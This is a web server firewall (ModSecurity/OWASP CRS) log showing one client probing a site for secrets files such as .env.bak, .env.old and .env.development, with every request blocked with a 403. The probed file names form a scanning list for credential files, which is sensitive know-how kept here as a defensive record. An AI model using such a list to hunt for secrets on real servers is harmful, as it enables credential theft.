[Mon May 11 16:33:23.705745 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.development"] [unique_id "agHos0WKUxpmnkK7zHx_AAAAAQs"]
[Mon May 11 16:33:23.706119 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.development"] [unique_id "agHos0WKUxpmnkK7zHx_AAAAAQs"]
[Mon May 11 16:33:23.706326 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.development"] [unique_id "agHos0WKUxpmnkK7zHx_AAAAAQs"]
[Mon May 11 16:33:23.706544 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.development"] [unique_id "agHos0WKUxpmnkK7zHx_AAAAAQs"]
[Mon May 11 16:33:23.862873 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.test"] [unique_id "agHos0WKUxpmnkK7zHx_AgAAAQs"]
[Mon May 11 16:33:23.863258 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.test"] [unique_id "agHos0WKUxpmnkK7zHx_AgAAAQs"]
[Mon May 11 16:33:23.863445 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.test"] [unique_id "agHos0WKUxpmnkK7zHx_AgAAAQs"]
[Mon May 11 16:33:23.863685 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.test"] [unique_id "agHos0WKUxpmnkK7zHx_AgAAAQs"]
[Mon May 11 16:33:24.019862 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.remote"] [unique_id "agHotEWKUxpmnkK7zHx_AwAAAQs"]
[Mon May 11 16:33:24.020249 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.remote"] [unique_id "agHotEWKUxpmnkK7zHx_AwAAAQs"]
[Mon May 11 16:33:24.020456 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.remote"] [unique_id "agHotEWKUxpmnkK7zHx_AwAAAQs"]
[Mon May 11 16:33:24.020741 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.remote"] [unique_id "agHotEWKUxpmnkK7zHx_AwAAAQs"]
[Mon May 11 16:33:24.178128 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.bak"] [unique_id "agHotEWKUxpmnkK7zHx_BAAAAQs"]
[Mon May 11 16:33:24.178520 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.bak"] [unique_id "agHotEWKUxpmnkK7zHx_BAAAAQs"]
[Mon May 11 16:33:24.178706 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.bak"] [unique_id "agHotEWKUxpmnkK7zHx_BAAAAQs"]
[Mon May 11 16:33:24.178943 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.bak"] [unique_id "agHotEWKUxpmnkK7zHx_BAAAAQs"]
[Mon May 11 16:33:24.335613 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup"] [unique_id "agHotEWKUxpmnkK7zHx_BgAAAQs"]
[Mon May 11 16:33:24.336002 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup"] [unique_id "agHotEWKUxpmnkK7zHx_BgAAAQs"]
[Mon May 11 16:33:24.336204 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup"] [unique_id "agHotEWKUxpmnkK7zHx_BgAAAQs"]
[Mon May 11 16:33:24.336463 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup"] [unique_id "agHotEWKUxpmnkK7zHx_BgAAAQs"]
[Mon May 11 16:33:24.492907 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.save"] [unique_id "agHotEWKUxpmnkK7zHx_BwAAAQs"]
[Mon May 11 16:33:24.493305 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.save"] [unique_id "agHotEWKUxpmnkK7zHx_BwAAAQs"]
[Mon May 11 16:33:24.493503 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.save"] [unique_id "agHotEWKUxpmnkK7zHx_BwAAAQs"]
[Mon May 11 16:33:24.493727 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.save"] [unique_id "agHotEWKUxpmnkK7zHx_BwAAAQs"]
[Mon May 11 16:33:24.655191 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.old"] [unique_id "agHotEWKUxpmnkK7zHx_CAAAAQs"]
[Mon May 11 16:33:24.655573 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.old"] [unique_id "agHotEWKUxpmnkK7zHx_CAAAAQs"]
[Mon May 11 16:33:24.655757 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.old"] [unique_id "agHotEWKUxpmnkK7zHx_CAAAAQs"]
[Mon May 11 16:33:24.655989 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.old"] [unique_id "agHotEWKUxpmnkK7zHx_CAAAAQs"]
[Mon May 11 16:33:24.814348 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.sample"] [unique_id "agHotEWKUxpmnkK7zHx_CQAAAQs"]
[Mon May 11 16:33:24.814720 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.sample"] [unique_id "agHotEWKUxpmnkK7zHx_CQAAAQs"]
[Mon May 11 16:33:24.814912 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.sample"] [unique_id "agHotEWKUxpmnkK7zHx_CQAAAQs"]
[Mon May 11 16:33:24.815132 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.sample"] [unique_id "agHotEWKUxpmnkK7zHx_CQAAAQs"]
[Mon May 11 16:33:24.972036 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.example"] [unique_id "agHotEWKUxpmnkK7zHx_CgAAAQs"]
[Mon May 11 16:33:24.972429 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.example"] [unique_id "agHotEWKUxpmnkK7zHx_CgAAAQs"]
[Mon May 11 16:33:24.972618 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.example"] [unique_id "agHotEWKUxpmnkK7zHx_CgAAAQs"]
[Mon May 11 16:33:24.972835 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.example"] [unique_id "agHotEWKUxpmnkK7zHx_CgAAAQs"]
